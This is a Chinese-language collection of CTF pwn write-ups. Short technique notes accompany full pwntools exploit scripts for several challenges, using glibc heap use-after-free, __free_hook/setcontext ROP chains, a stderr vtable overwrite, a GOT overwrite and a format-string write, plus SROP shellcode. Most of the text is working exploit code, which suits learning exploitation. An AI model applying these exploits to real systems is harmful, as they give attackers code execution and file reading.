malloc可以从bin里取回可以保留内容, realloc size为0时会free这个chunk, 本题就有UAF漏洞了 先free然后再取回, 相同的两次操作拿到heap_base, libc_base, 然后uaf把free_hook覆盖为setcontext+53 后半部分是setcontext+orw(请自备flag文件),用在沙盒堆里, setcontext可以看这里, 计算距离rdi的偏移就行, 控制好0xa(rsp)和0xa8(rip)
http://blog.eonew.cn/archives/993
flag随便写到堆里某个地方,自己找得到就行
exp:
from pwn import * from LibcSearcher import * local_file = './oooorder' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' select = 0 if select == 0: r = process(local_file) libc = ELF(local_libc) else: r = remote('', ) libc = ELF(remote_libc) elf = ELF(local_file) context.log_level = 'debug' context.arch = elf.arch se = lambda data :r.send(data) sa = lambda delim,data :r.sendafter(delim, data) sl = lambda data :r.sendline(data) sla = lambda delim,data :r.sendlineafter(delim, data) sea = lambda delim,data :r.sendafter(delim, data) rc = lambda numb=4096 :r.recv(numb) rl = lambda :r.recvline() ru = lambda delims :r.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr)) def debug(cmd=''): gdb.attach(r,cmd) def menu(choice): sea('Your choice :\n', str(choice)) def add(size, content): menu(1) sea('How much is the order?\n', str(size)) sea('Order notes:\n', content) def edit(index, content): menu(2) sea('Index of order:\n', str(index)) sea('Order notes:\n', content) def vul(index): menu(2) sea('Index of order:\n', str(index)) def show(): menu(3) def free(index): menu(4) sea('Index of order:\n', str(index)) for i in range(8): add(0x300, 'aa') for i in range(7, -1, -1): free(i) for i in range(7): add(0x300, '\xe0') show() ru('[0]:') heap_base = uu64(rc(6)) - 0x8e0 info('heap_base', heap_base) add(0x1f0, '\xa0') show() ru('[7]:') libc_base = uu64(rc(6)) - 608 - 0x10 - libc.sym['__malloc_hook'] info('libc_base', libc_base) free_hook = libc_base + libc.sym['__free_hook'] gadget = libc_base + libc.sym['setcontext'] + 53 fake_rsp = heap_base + 0x1d80 flag = fake_rsp - 0x10 add(0x10, 'aa')#8 add(0, '')#9 add(0x10, 'bb')#10 free(8) vul(9) free(9) free(10) add(0x10, p64(free_hook)) add(0x10, p64(gadget)) ret = libc_base + 0x00000000000008aa # ret pop_rdi_ret = libc_base + 0x000000000002155f # pop rdi ; ret pop_rsi_ret = libc_base + 0x0000000000023e6a # pop rsi ; ret pop_rdx_rsi_ret = libc_base + 0x00000000001306d9 # pop rdx ; pop rsi ; ret pop_rdx_ret = libc_base + 0x0000000000001b96 # pop rdx ; ret p = 'a'*0xa0 + p64(fake_rsp) + p64(ret) p = p.ljust(0xb0, '\x00') p += './flag\x00\x00' p += p64(0) p += p64(pop_rdi_ret) + p64(flag) p += p64(pop_rsi_ret) + p64(0) p += p64(libc_base+libc.sym['open']) p += p64(pop_rdi_ret) + p64(3) p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100) p += p64(libc_base + libc.sym['read']) p += p64(pop_rdi_ret) + p64(1) p += p64(pop_rdx_rsi_ret) + p64(0x30) + p64(fake_rsp+0x100) p += p64(libc_base + libc.sym['write']) add(0x400, p)#10 free(10) #debug() #sl('1') r.interactive()IO_file 本题给了printf的地址, 确定libc版本2.29 本题的关键是fclose 思路是覆盖stderr的vtable的io_finish为og vtable的地址是libc_base + libc.sym[‘IO_2_1_stderr’] + 0xd8 本题的第二个read多此一举了orz, 2.29的vtable的值和他的函数指针都是可以写的,所以我们不用动他,发送一个\x58就好 贴几张表: 以上图片来源:
https://www.jianshu.com/p/1e45b785efc1 http://chumen77.xyz/2020/06/27/DASCTF%E5%AE%89%E6%81%92%E6%9C%88%E8%B5%9B(6th)/#secret
fclose先执行close,然后io_finish vtable在0xd8的位置
最后贴张io_file的自己理解的图: exp:
from pwn import * from LibcSearcher import * local_file = './secret' local_libc = '/root/glibc-all-in-one/libs/2.29/libc-2.29.so' remote_libc = '/root/glibc-all-in-one/libs/2.29/libc-2.29.so' select = 0 if select == 0: r = process(local_file) libc = ELF(local_libc) else: r = remote('', ) libc = ELF(remote_libc) elf = ELF(local_file) context.log_level = 'debug' context.arch = elf.arch se = lambda data :r.send(data) sa = lambda delim,data :r.sendafter(delim, data) sl = lambda data :r.sendline(data) sla = lambda delim,data :r.sendlineafter(delim, data) sea = lambda delim,data :r.sendafter(delim, data) rc = lambda numb=4096 :r.recv(numb) rl = lambda :r.recvline() ru = lambda delims :r.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr)) def debug(cmd=''): gdb.attach(r,cmd) ru('0x') leak_addr= int(rc(12), 16) libc_base = leak_addr - libc.sym['printf'] info('libc_base', libc_base) vtable = libc_base + libc.sym['_IO_2_1_stderr_'] + 0xd8 info('vtable', vtable) se(p64(vtable)) se('\x58') rec = libc_base + 0xe2386 p = p64(0)*2+p64(rec) se(p) r.interactive()最后exec 1>&2恢复输出
本题使用自带的libc,先 export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH 然后可以运行 数组上溢修改got表 19.04的是2.29, 19.10的是2.30, 20的是2.31 通过vim本题给出的Dockerfile可以看出libc是2.30 一次只能写一个字节,我们要尽可能少地修改,就需要找一个合适的gadget和write的地址相近 本题给了execve的地址 随机了后三位,还原一下 一个一个og测过去,最后发现0x10afa4这个只要修改两次就行 计算write_got和array的距离 然后覆盖 本来应该是0x10afa9的og,改成a4是为了第一次修改之后write还可以正常运行, 具体看调试: 如果是a9的话eax就没有值了, syscall就会报错, 所以用a4 不过不知道为什么动调的时候显示先data后index,不过反正都要改,问题不是很大 (大概) exp:
from pwn import * from LibcSearcher import * local_file = './Memory_Monster_IV' local_libc = '/root/glibc-all-in-one/libs/2.30/libc-2.30.so' remote_libc = '/root/glibc-all-in-one/libs/2.30/libc-2.30.so' select = 0 if select == 0: r = process(local_file) libc = ELF(local_libc) else: r = remote('', ) libc = ELF(remote_libc) elf = ELF(local_file) context.log_level = 'debug' context.arch = elf.arch se = lambda data :r.send(data) sa = lambda delim,data :r.sendafter(delim, data) sl = lambda data :r.sendline(data) sla = lambda delim,data :r.sendlineafter(delim, data) sea = lambda delim,data :r.sendafter(delim, data) rc = lambda numb=4096 :r.recv(numb) rl = lambda :r.recvline() ru = lambda delims :r.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr)) def debug(cmd=''): gdb.attach(r,cmd) leak = uu64(ru('\x7f')[-6:]) info('leak', leak) libc_base = (leak - libc.sym['execve'])&(~0xfff) info('libc_base', libc_base) info('write', libc_base+libc.sym['write']) one_gadget = [0xe6b93, 0xe6b96, 0xe6b99, 0x10afa4] og = libc_base + one_gadget[3] info('og', og) #write_got = 0x4018 #array = 0x5DE0 #distance = 7624 #debug() sl('-7624') sl(hex(og&0xff)) sl('-7623') sl(hex((og>>8)&0xff)) r.interactive()本题别忘了最后用exec 1>&2恢复stdout(输出)
堆上的格式化字符串 总的思路是修改libc_start_main_ret为og, libc_start_main_ret = libc_start_main+231 学到的一些: 先gdb 程序 断在main 到read为止 找到a->b类型的,a在栈上,b也在栈上,这种栈上存了栈的指针,来任意地址写 可以看到7是符合的,33(21)是和7相连的 修改5的libc_start_main_ret 后面为啥是11, 5+6=11 格式化字符串是会一改到底的(大概,个人理解是这样),改7处的话会改356的值, 最后,消耗掉所有循环,来返回触发og exp:
from pwn import * from LibcSearcher import * local_file = './springboard' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' select = 0 if select == 0: r = process(local_file) libc = ELF(local_libc) else: r = remote('', ) libc = ELF(remote_libc) elf = ELF(local_file) context.log_level = 'debug' context.arch = elf.arch se = lambda data :r.send(data) sa = lambda delim,data :r.sendafter(delim, data) sl = lambda data :r.sendline(data) sla = lambda delim,data :r.sendlineafter(delim, data) sea = lambda delim,data :r.sendafter(delim, data) rc = lambda numb=4096 :r.recv(numb) rl = lambda :r.recvline() ru = lambda delims :r.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr)) def debug(cmd=''): gdb.attach(r,cmd) def send(s): sa('input your name:', s) def send2(s): sla('input your name:', s) send('%11$p-%13$p-%39$p') ru('0x') libc_base = int(rc(12), 16) - 231 - libc.sym['__libc_start_main'] info('libc_base', libc_base) ru('0x') stack = int(rc(12), 16) info('stack', stack) ru('0x') addr39 = int(rc(12), 16) info('addr39', addr39) addr11 = stack - 0xe0 og = libc_base + 0x4f2c5 addr1 = og & 0xffff #debug() p = "%{}c%{}$hn".format((addr11+2)&0xffff, 13) send(p) #debug() p = "%{}c%{}$hhnAAAA".format((og>>16)&0xff,39) send(p) #debug() p = "%{}c%{}$hhnAAAA".format(addr11&0xffff,13) send(p) #debug() p = "%{}c%{}$hnAAAA".format(og&0xffff,39) send(p) #debug() send2("\x00") send2('\x00') send2('\x00') #debug() #sl('aaaa') r.interactive()水平不够,复现做睡着了,打扰,贴个exp溜了
exp:
from pwn import * from LibcSearcher import * local_file = './pwn' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' select = 0 if select == 0: r = process(local_file) libc = ELF(local_libc) else: r = remote('', ) libc = ELF(remote_libc) elf = ELF(local_file) context.log_level = 'debug' context.arch = elf.arch se = lambda data :r.send(data) sa = lambda delim,data :r.sendafter(delim, data) sl = lambda data :r.sendline(data) sla = lambda delim,data :r.sendlineafter(delim, data) sea = lambda delim,data :r.sendafter(delim, data) rc = lambda numb=4096 :r.recv(numb) rl = lambda :r.recvline() ru = lambda delims :r.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr)) def debug(cmd=''): gdb.attach(r,cmd) def menu(choice): sea('Your Choice: ', str(choice)) def add(index, size, content): menu(1) sea('index>> ', str(index)) sea('size>> ', str(size)) sea('name>> ', content) def free(index): menu(2) sea('index>> ', str(index)) def show(index): menu(3) sea('index>> ', str(index)) def edit(index, content): menu(4) sea('index>> ', str(index)) sea('name>> ', content) for i in range(8): add(i, 0xf8, 'a') for i in range(8): free(i) for i in range(7): add(i, 0x68, 'a') add(7, 0xf8, 'a') for i in range(8): free(i) for i in range(8): add(i, 0x160, 'a') for i in range(8): free(i) add(0, 0xf8, 'a') add(1, 0x68, 'a') add(2, 0x68, 'a') add(3, 0xf8, 'a') add(4, 0x68, 'a') add(5, 0xf8, 'a') free(2) free(0) p = 'a' * 0x60 p += p64(0x1e0) # pre_size add(2, 0x68, p) free(3) add(0, 0xf8+0x70, 'a' * 0xf8 + p64(0x71)) show(2) libc_base = uu64(ru('\x7f')[-6:]) - 96 - 0x10 - libc.sym['__malloc_hook'] main_arena = libc_base + 0x10 + 96 + libc.sym['__malloc_hook'] info('libc_base', libc_base) free_hook = libc_base + libc.sym['__free_hook'] setcontext = libc_base + libc.sym['setcontext'] + 53 info('free_hook', free_hook) free(4) free(1) show(0) rc(0x100) heap_addr = uu64(rc(6)) info('heap_addr', heap_addr) free(0) fake_chunk_addr = heap_addr-0x2d0 fake_chunk = '' fake_chunk += p64(0) + p64(0x1d1) fake_chunk += p64(fake_chunk_addr+0x8) + p64(fake_chunk_addr+0x10) fake_chunk += p64(fake_chunk_addr) fake_chunk += 'a' * (0x1d0- len(fake_chunk)) fake_chunk += p64(0x1d0) # pre_size add(0, 0x1d8, fake_chunk) add(6, 0xf8, 'a') free(6) fake_chunk = p64(0) + p64(0x101) fake_chunk += p64(main_arena) + p64(free_hook-16-16) edit(0, fake_chunk) add(7, 0xf0, 'a') p = '' p += 'a' * 0xf0 p += p64(0) + p64(0x71) p += p64(free_hook-16-3) edit(0, p) add(8, 0x60, 'a') sc2_addr = free_hook & 0xfffffffffffff000 sc1 = ''' xor rdi, rdi mov rsi, %d mov edx, 0x1000 mov eax, 0; //SYS_read syscall jmp rsi ''' % sc2_addr pay = 'aaa' pay += p64(setcontext+53) + p64(free_hook + 0x10) + asm(sc1) add(9, 0x60, pay) mprotect = libc_base + libc.sym['mprotect'] frame = SigreturnFrame() frame.rsp = free_hook + 8 # ret frame.rip = mprotect frame.rdi = sc2_addr frame.rsi = 0x1000 frame.rdx = 4 | 2 | 1 edit(0, str(frame)) free(0) flag_str = './flag\x00\x00' sc2 = ''' mov rax, %s push rax mov rdi, 0 mov rsi, rsp xor rdx, rdx mov rax, 257; //openat syscall mov rdi, rax mov rsi, rsp mov rdx, 1024 mov rax, 0; //read syscall mov rdi, 1; mov rsi, rsp mov rdx, rax mov rax, 1; //write syscall mov rdi, 0 mov rax, 60 syscall; //exit ''' % hex(u64(flag_str)) se(asm(sc2)) #debug() #sl('1') r.interactive()